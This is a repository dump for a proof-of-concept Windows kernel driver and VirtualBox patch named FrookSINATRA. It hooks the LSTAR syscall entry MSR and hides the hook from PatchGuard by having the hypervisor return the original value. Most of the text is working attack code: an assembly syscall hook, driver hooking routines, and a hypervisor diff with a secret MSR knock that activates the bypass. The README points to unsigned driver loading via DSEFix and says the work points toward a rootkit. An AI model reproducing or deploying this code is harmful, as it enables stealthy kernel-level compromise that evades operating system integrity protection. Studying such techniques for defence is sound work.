├── README.md
├── amd64
    └── context.asm
├── context.h
├── frookSINATRA_virtualbox.diff
├── main.c
└── sources


/README.md:
--------------------------------------------------------------------------------
 1 | <pre>
 2 | <b>FrookSINATRA</b>
 3 | is a kernel driver and a Virtualbox(Hypervisor) patch to make possible hook of the LSTAR, even with patchguard (Up-to-date Windows 8.1 on July 2014) activated.
 4 | 
 5 | 
 6 | <b>DRIVER:</b>
 7 | On Load, the driver:
 8 | 	1. saves the original lSTAR,
 9 | 	2. asks the hypervisor (MSR Knocking) to save the original LSTAR too,
10 | 	3. writes the LSTAR to with the address of the hook function,
11 | 	4. ... Working here ...
12 | 
13 | On unload, the driver:
14 | 	6. restores the old LSTAR
15 | 	5. asks the hypervisor to forget the original LSTAR
16 | 	
17 | 	
18 | <b>HYPERVISOR:</b>
19 | 	I changed the virtualbox (Dirty patch again, sorry) VT-X hypervisor HMVMXR0.cpp, to intercept read and write of MSR.
20 | 	When the kernel writes a magic value on a magic MSR, the LSTAR is stored.
21 | 	Each time patchguard is executed, it asks the MSR like this asm("rdmsr 0xC000005") <a href="http://pastebin.com/mGbFHkk5">Patchguard MSR Request</a>, the hypervisor intercepts the read, and give the original LSTAR value (legit one), even if it was hooked by the driver !
22 | 	
23 | 	This is working because when a sysenter/syscall is made, the LSTAR MSR isn't read via rdmsr instruction, but read by the CPU itself, and hypervisor isn't called. So the instruction flow is redirected to the real value of the LSTAR, the hook function, if LSTAR is hooked.
24 | 	
25 | <b>NOTE:</b>
26 | 	The driver can be loaded with dsefix <a href="http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3322">DSEFix</a>
27 | 	The driver can work on Windows 7 x64 without the hypervisor
28 | 
29 | <b>TODO:</b>
30 | 	* Make a version where all the thing is done in hypervisor, write the hook EIP in a magic MSR...
31 | 	* Make it working with AMD, 2 lines to change,
32 | 	* Could be integrated in (this nice tool) <a href="https://github.com/zer0mem/MiniHyperVisorProject">MiniHyperVisorProject</a>, to make it working on a live Windows (bluePill+Intercept R/W MSR+frookSINATRA = Rootkit ;p)
33 | 	* Real syscall analysis...but this is a Poc...
34 | </pre>
35 | 


--------------------------------------------------------------------------------
/amd64/context.asm:
--------------------------------------------------------------------------------
 1 | EXTERN origKiSystemCall64:QWORD
 2 | EXTERN myPrologKiSystemCall64:QWORD
 3 | EXTERN syscall_number:QWORD
 4 | 
 5 | .data
 6 | 
 7 | .code
 8 | 
 9 | ;Secure the registers and the stack :D
10 | myKiSystemCall64ASM PROC
11 | 	swapgs ;USER->KERNEL
12 | 	mov qword ptr gs:[10h],rsp ;save stack pointer
13 | 	mov rsp,qword ptr gs:[1a8h] ;get stack pointer
14 | 	sub rsp,4096h ;far far away !
15 | 
16 | 	;TODO: FPU registers
17 | 	mov [rsp+8],rax ;save register
18 | 	mov [rsp+16],rbx
19 | 	mov [rsp+24],rcx
20 | 	mov [rsp+32],rdx
21 | 	mov [rsp+40],rsi
22 | 	mov [rsp+48],rdi
23 | 	mov [rsp+56],r8
24 | 	mov [rsp+64],r9
25 | 	mov [rsp+72],r10
26 | 	mov [rsp+80],r11
27 | 	mov [rsp+88],r12
28 | 	mov [rsp+96],r13
29 | 	mov [rsp+104],r14
30 | 	mov [rsp+112],r15
31 | 	sub rsp, 120
32 | 
33 | 	mov qword ptr [syscall_number],rax
34 | 	
35 | 	call qword ptr [myPrologKiSystemCall64];
36 | 
37 | 	add rsp, 120 
38 | 	mov rax,[rsp+8] ;restore register
39 | 	mov rbx,[rsp+16]
40 | 	mov rcx,[rsp+24]
41 | 	mov rdx,[rsp+32]
42 | 	mov rsi,[rsp+40]
43 | 	mov rdi,[rsp+48]
44 | 	mov r8,[rsp+56]
45 | 	mov r9,[rsp+64]
46 | 	mov r10,[rsp+72]
47 | 	mov r11,[rsp+80]
48 | 	mov r12,[rsp+88]
49 | 	mov r13,[rsp+96]
50 | 	mov r14,[rsp+104]
51 | 	mov r15,[rsp+112]
52 | 
53 | 	mov rsp,qword ptr gs:[10h] ;restore original stack
54 | 	swapgs ;KERNEL->USER
55 | 
56 | 	jmp [origKiSystemCall64] ;jmp to orginal KiSystemCall64
57 | myKiSystemCall64ASM ENDP
58 | 
59 | END
60 | 


--------------------------------------------------------------------------------
/context.h:
--------------------------------------------------------------------------------
1 | void myKiSystemCall64ASM(void);
2 | 


--------------------------------------------------------------------------------
/frookSINATRA_virtualbox.diff:
--------------------------------------------------------------------------------
  1 | diff -bur VirtualBox-4.3.12-orig/include/VBox/vmm/cpum.h VirtualBox-4.3.12/include/VBox/vmm/cpum.h
  2 | --- VirtualBox-4.3.12-orig/include/VBox/vmm/cpum.h	2014-05-16 14:18:35.000000000 +0200
  3 | +++ VirtualBox-4.3.12/include/VBox/vmm/cpum.h	2014-07-20 07:45:03.210379986 +0200
  4 | @@ -420,6 +420,10 @@
  5 |  VMM_INT_DECL(void)  CPUMGuestLazyLoadHiddenSelectorReg(PVMCPU pVCpu, PCPUMSELREG pSReg);
  6 |  VMMR0_INT_DECL(void)        CPUMR0SetGuestTscAux(PVMCPU pVCpu, uint64_t uValue);
  7 |  VMMR0_INT_DECL(uint64_t)    CPUMR0GetGuestTscAux(PVMCPU pVCpu);
  8 | +
  9 | +//PG Bypass: Allow HMVMXR0.cpp to read the LSTAR
 10 | +VMMR0_INT_DECL(uint64_t)    CPUMR0GetGuestMsrLSTAR(PVMCPU pVCpu);
 11 | +
 12 |  /** @} */
 13 | diff -bur VirtualBox-4.3.12-orig/src/VBox/VMM/VMMAll/CPUMAllMsrs.cpp VirtualBox-4.3.12/src/VBox/VMM/VMMAll/CPUMAllMsrs.cpp
 14 | --- VirtualBox-4.3.12-orig/src/VBox/VMM/VMMAll/CPUMAllMsrs.cpp	2014-05-16 14:27:25.000000000 +0200
 15 | +++ VirtualBox-4.3.12/src/VBox/VMM/VMMAll/CPUMAllMsrs.cpp	2014-07-20 08:09:02.570235345 +0200
 16 | @@ -1384,10 +1384,16 @@
 17 |  }
 18 |  
 19 |  
 20 | +static uint64_t myMsrLSTAR = 0; //used to update the LSTAR MSR
 21 | +static uint64_t savedMsrLSTAR = 0; //used to store the clean LSTAR MSR
 22 |  /** @callback_method_impl{FNCPUMRDMSR} */
 23 |  static DECLCALLBACK(int) cpumMsrRd_Amd64LongSyscallTarget(PVMCPU pVCpu, uint32_t idMsr, PCCPUMMSRRANGE pRange, uint64_t *puValue)
 24 |  {
 25 | +	if(savedMsrLSTAR){ // If savedMsrLSTAR is set, so give it :D
 26 | +		*puValue = savedMsrLSTAR;
 27 | +	}else{
 28 |      *puValue = pVCpu->cpum.s.Guest.msrLSTAR;
 29 | +	}
 30 |      return VINF_SUCCESS;
 31 |  }
 32 |  
 33 | @@ -1401,6 +1407,7 @@
 34 |          return VERR_CPUM_RAISE_GP_0;
 35 |      }
 36 |      pVCpu->cpum.s.Guest.msrLSTAR = uValue;
 37 | +    myMsrLSTAR = uValue;
 38 |      return VINF_SUCCESS;
 39 |  }
 40 |  
 41 | @@ -4950,6 +4957,7 @@
 42 |      int             rc;
 43 |      PVM             pVM    = pVCpu->CTX_SUFF(pVM);
 44 |      PCPUMMSRRANGE   pRange = cpumLookupMsrRange(pVM, idMsr);
 45 | +	LogRel(("CPUM: RDMSR %#x (%s) -> %#llx\n", idMsr, pRange->szName, *puValue));
 46 |      if (pRange)
 47 |      {
 48 |          CPUMMSRRDFN  enmRdFn = (CPUMMSRRDFN)pRange->enmRdFn;
 49 | @@ -4962,6 +4970,7 @@
 50 |          STAM_REL_COUNTER_INC(&pVM->cpum.s.cMsrReads);
 51 |  
 52 |          rc = pfnRdMsr(pVCpu, idMsr, pRange, puValue);
 53 | +        LogRel(("CPUM: RDMSR %#x (%s) -> %#llx\n", idMsr, pRange->szName, *puValue));
 54 |          if (RT_SUCCESS(rc))
 55 |          {
 56 |              Log2(("CPUM: RDMSR %#x (%s) -> %#llx\n", idMsr, pRange->szName, *puValue));
 57 | @@ -4978,7 +4987,7 @@
 58 |      }
 59 |      else
 60 |      {
 61 | -        Log(("CPUM: Unknown RDMSR %#x -> #GP(0)\n", idMsr));
 62 | +        LogRel(("CPUM: Unknown RDMSR %#x -> #GP(0)\n", idMsr));
 63 |          STAM_REL_COUNTER_INC(&pVM->cpum.s.cMsrReads);
 64 |          STAM_REL_COUNTER_INC(&pVM->cpum.s.cMsrReadsUnknown);
 65 |          rc = VERR_CPUM_RAISE_GP_0;
 66 | @@ -5014,6 +5023,23 @@
 67 |      int             rc;
 68 |      PVM             pVM    = pVCpu->CTX_SUFF(pVM);
 69 |      PCPUMMSRRANGE   pRange = cpumLookupMsrRange(pVM, idMsr);
 70 | +    
 71 | +//Secret command to store the clean value of the LSTAR
 72 | +#define SECRET_MSR	0x01234567
 73 | +#define BYPASS_ACTIVATION 0xDEADDEADDEADDEAD
 74 | +#define BYPASS_DESACTIVATION 0xC0DEC0DEC0DEC0DE
 75 | +	LogRel(("CPUM: WRMSR %#x (%s), %#llx [%#llx]\n", idMsr, pRange->szName, 0, uValue));
 76 | +    if(idMsr == SECRET_MSR){
 77 | +		if(uValue == BYPASS_ACTIVATION){
 78 | +			savedMsrLSTAR = pVCpu->cpum.s.Guest.msrLSTAR;
 79 | +			LogRel(("[BYPASS_ACTIVATION] %p\n", savedMsrLSTAR));
 80 | +		}
 81 | +		if(uValue == BYPASS_DESACTIVATION){
 82 | +			savedMsrLSTAR = 0;
 83 | +			LogRel(("[BYPASS_DESACTIVATION] %p\n", savedMsrLSTAR));
 84 | +		}
 85 | +	}
 86 | +	
 87 |      if (pRange)
 88 |      {
 89 |          STAM_COUNTER_INC(&pRange->cWrites);
 90 | @@ -5589,4 +5615,15 @@
 91 |      pVCpu->cpum.s.GuestMsrs.msr.TscAux = uValue;
 92 |  }
 93 |  
 94 | +
 95 | +//Allow to read LSTAR MSR
 96 | +VMMR0_INT_DECL(uint64_t) CPUMR0GetGuestMsrLSTAR(PVMCPU pVCpu)
 97 | +{
 98 | +	uint64_t tmp = myMsrLSTAR;
 99 | +	myMsrLSTAR = 0;
100 | +    return tmp;
101 | +}
102 | +
103 | +
104 | +
105 |  #endif /* IN_RING0 */
106 | diff -bur VirtualBox-4.3.12-orig/src/VBox/VMM/VMMR0/HMVMXR0.cpp VirtualBox-4.3.12/src/VBox/VMM/VMMR0/HMVMXR0.cpp
107 | --- VirtualBox-4.3.12-orig/src/VBox/VMM/VMMR0/HMVMXR0.cpp	2014-05-16 14:27:27.000000000 +0200
108 | +++ VirtualBox-4.3.12/src/VBox/VMM/VMMR0/HMVMXR0.cpp	2014-07-20 07:29:30.124092866 +0200
109 | @@ -1864,7 +1864,9 @@
110 |          hmR0VmxSetMsrPermission(pVCpu, MSR_IA32_SYSENTER_CS,  VMXMSREXIT_PASSTHRU_READ, VMXMSREXIT_PASSTHRU_WRITE);
111 |          hmR0VmxSetMsrPermission(pVCpu, MSR_IA32_SYSENTER_ESP, VMXMSREXIT_PASSTHRU_READ, VMXMSREXIT_PASSTHRU_WRITE);
112 |          hmR0VmxSetMsrPermission(pVCpu, MSR_IA32_SYSENTER_EIP, VMXMSREXIT_PASSTHRU_READ, VMXMSREXIT_PASSTHRU_WRITE);
113 | -        hmR0VmxSetMsrPermission(pVCpu, MSR_K8_LSTAR,          VMXMSREXIT_PASSTHRU_READ, VMXMSREXIT_PASSTHRU_WRITE);
114 | +        //hmR0VmxSetMsrPermission(pVCpu, MSR_K8_LSTAR,          VMXMSREXIT_PASSTHRU_READ, VMXMSREXIT_PASSTHRU_WRITE);
115 | +		//Intercept read and write on LSTAR
116 | +        hmR0VmxSetMsrPermission(pVCpu, MSR_K8_LSTAR,          VMXMSREXIT_INTERCEPT_READ, VMXMSREXIT_INTERCEPT_WRITE);
117 |          hmR0VmxSetMsrPermission(pVCpu, MSR_K6_STAR,           VMXMSREXIT_PASSTHRU_READ, VMXMSREXIT_PASSTHRU_WRITE);
118 |          hmR0VmxSetMsrPermission(pVCpu, MSR_K8_SF_MASK,        VMXMSREXIT_PASSTHRU_READ, VMXMSREXIT_PASSTHRU_WRITE);
119 |          hmR0VmxSetMsrPermission(pVCpu, MSR_K8_KERNEL_GS_BASE, VMXMSREXIT_PASSTHRU_READ, VMXMSREXIT_PASSTHRU_WRITE);
120 | @@ -4070,7 +4072,10 @@
121 |          {
122 |              pGuestMsr->u32Msr      = MSR_K8_LSTAR;
123 |              pGuestMsr->u32Reserved = 0;
124 | +            pGuestMsr->u64Value    = CPUMR0GetGuestMsrLSTAR(pVCpu);
125 | +            if(pGuestMsr->u64Value == 0){
126 |              pGuestMsr->u64Value    = pMixedCtx->msrLSTAR;           /* 64 bits mode syscall rip */
127 | +			}
128 |              pGuestMsr++; cGuestMsrs++;
129 |              pGuestMsr->u32Msr      = MSR_K6_STAR;
130 |              pGuestMsr->u32Reserved = 0;
131 | 


--------------------------------------------------------------------------------
/main.c:
--------------------------------------------------------------------------------
  1 | #include <ntddk.h>
  2 | #include <wdm.h>
  3 | #include "context.h"
  4 | 
  5 | #define MAX_ACTIVE_CPU 16
  6 | #define LSTAR_MSR 0xC0000082
  7 | 
  8 | #define SECRET_MSR	0x01234567
  9 | #define BYPASS_ACTIVATION	0xDEADDEADDEADDEAD
 10 | #define BYPASS_DESACTIVATION 0xC0DEC0DEC0DEC0DE
 11 | 
 12 | typedef VOID(*KISYSTEMCALL64)(); 
 13 | 
 14 | KISYSTEMCALL64 origKiSystemCall64[MAX_ACTIVE_CPU];
 15 | KISYSTEMCALL64 myPrologKiSystemCall64;
 16 | ULONG active_processor_count;
 17 | UINT64 syscall_number;
 18 | UINT64 proceed_syscall;
 19 | 
 20 | VOID prologKiSystemCall64(){
 21 | 	//DbgPrint("In other words, please be true %16x\n", syscall_number);
 22 | 	proceed_syscall++;
 23 | }
 24 | 
 25 | VOID DisplayAllLSTAR(){
 26 | 	GROUP_AFFINITY old_affinity, new_affinity;
 27 | 	UINT16 current_processor;
 28 | 	UINT64 tmpLSTAR;
 29 | 	
 30 | 	for(current_processor=0; current_processor<active_processor_count; current_processor++){
 31 | 		memset(&new_affinity, 0, sizeof(GROUP_AFFINITY));
 32 | 		memset(&old_affinity, 0, sizeof(GROUP_AFFINITY));
 33 | 		new_affinity.Group = 0;
 34 | 		new_affinity.Mask = 1ULL << (current_processor);
 35 | 		KeSetSystemGroupAffinityThread(&new_affinity, &old_affinity);
 36 | 		tmpLSTAR = __readmsr(LSTAR_MSR);
 37 | 		DbgPrint("CPU %d LSTAR %p\n", current_processor, tmpLSTAR);
 38 | 		KeRevertToUserGroupAffinityThread(&old_affinity);
 39 | 	}
 40 | }
 41 | 
 42 | VOID HookAllLSTAR(){
 43 | 	GROUP_AFFINITY old_affinity, new_affinity;
 44 | 	UINT16 current_processor;
 45 | 	
 46 | 	try{
 47 | 		__writemsr(SECRET_MSR, BYPASS_ACTIVATION);
 48 | 	}except (EXCEPTION_EXECUTE_HANDLER) {
 49 | 	}
 50 | 	
 51 | 	for(current_processor=0; current_processor<active_processor_count; current_processor++){
 52 | 		memset(&new_affinity, 0, sizeof(GROUP_AFFINITY));
 53 | 		memset(&old_affinity, 0, sizeof(GROUP_AFFINITY));
 54 | 		new_affinity.Group = 0;
 55 | 		new_affinity.Mask = 1ULL << (current_processor);
 56 | 		KeSetSystemGroupAffinityThread(&new_affinity, &old_affinity);
 57 | 		origKiSystemCall64[current_processor] = (KISYSTEMCALL64)__readmsr(LSTAR_MSR);
 58 | 		__writemsr(LSTAR_MSR, (UINT64)myKiSystemCall64ASM);
 59 | 		KeRevertToUserGroupAffinityThread(&old_affinity);
 60 | 	}
 61 | }
 62 | 
 63 | VOID UnhookAllLSTAR(){
 64 | 	GROUP_AFFINITY old_affinity, new_affinity;
 65 | 	UINT16 current_processor;
 66 | 	
 67 | 	try{
 68 | 		__writemsr(SECRET_MSR, BYPASS_DESACTIVATION);
 69 | 	}except (EXCEPTION_EXECUTE_HANDLER) {
 70 | 	}
 71 | 	
 72 | 	for(current_processor=0; current_processor<active_processor_count; current_processor++){
 73 | 		if(origKiSystemCall64[current_processor]){
 74 | 			memset(&new_affinity, 0, sizeof(GROUP_AFFINITY));
 75 | 			memset(&old_affinity, 0, sizeof(GROUP_AFFINITY));
 76 | 			new_affinity.Group = 0;
 77 | 			new_affinity.Mask = 1ULL << (current_processor);
 78 | 			KeSetSystemGroupAffinityThread(&new_affinity, &old_affinity);
 79 | 			__writemsr(LSTAR_MSR, (UINT64)origKiSystemCall64[current_processor]);
 80 | 			KeRevertToUserGroupAffinityThread(&old_affinity);
 81 | 		}
 82 | 	}
 83 | }
 84 | 
 85 | VOID DriverUnload(PDRIVER_OBJECT pDriverObject) {
 86 | 	DbgPrint("\nFill my heart with song\n");
 87 | 	DisplayAllLSTAR();
 88 | 	UnhookAllLSTAR();
 89 | 	DisplayAllLSTAR();
 90 | 	DbgPrint("Let me sing forever more\n");
 91 | 	DbgPrint("Proceed syscall %p\n", proceed_syscall);
 92 | }
 93 | 
 94 | NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING RegistryPath){
 95 | 	UINT16 current_processor;
 96 | 	
 97 | 	myPrologKiSystemCall64 = prologKiSystemCall64;
 98 | 	active_processor_count = KeQueryActiveProcessorCount(NULL);
 99 | 	proceed_syscall = 0;
100 | 	
101 | 	if(active_processor_count == 0
102 | 	|| active_processor_count > MAX_ACTIVE_CPU){
103 | 		DbgPrint("Too many processors !\n");
104 | 		return STATUS_UNSUCCESSFUL;
105 | 	}
106 | 
107 | 	
108 | 	for(current_processor=0; current_processor<MAX_ACTIVE_CPU; current_processor++){
109 | 		origKiSystemCall64[current_processor] = NULL;
110 | 	}
111 | 	
112 | 	DbgPrint("Fly me to the moon...\n");
113 | 	DisplayAllLSTAR();
114 | 	HookAllLSTAR();
115 | 	DisplayAllLSTAR();
116 | 	DbgPrint("And let me play among the LSTAR !\n");
117 | 	
118 | 	pDriverObject->DriverUnload = DriverUnload; 
119 | 	return STATUS_SUCCESS;
120 | }  
121 | 


--------------------------------------------------------------------------------
/sources:
--------------------------------------------------------------------------------
1 | TARGETNAME = frookSINATRA
2 | TARGETPATH = obj
3 | TARGETTYPE = DRIVER
4 | #TARGETLIBS = context.obj
5 | INCLUDES = %BUILD%\inc
6 | LIBS = %BUILD%\lib
7 | SOURCES = main.c
8 | AMD64_SOURCES=context.asm
9 | 


--------------------------------------------------------------------------------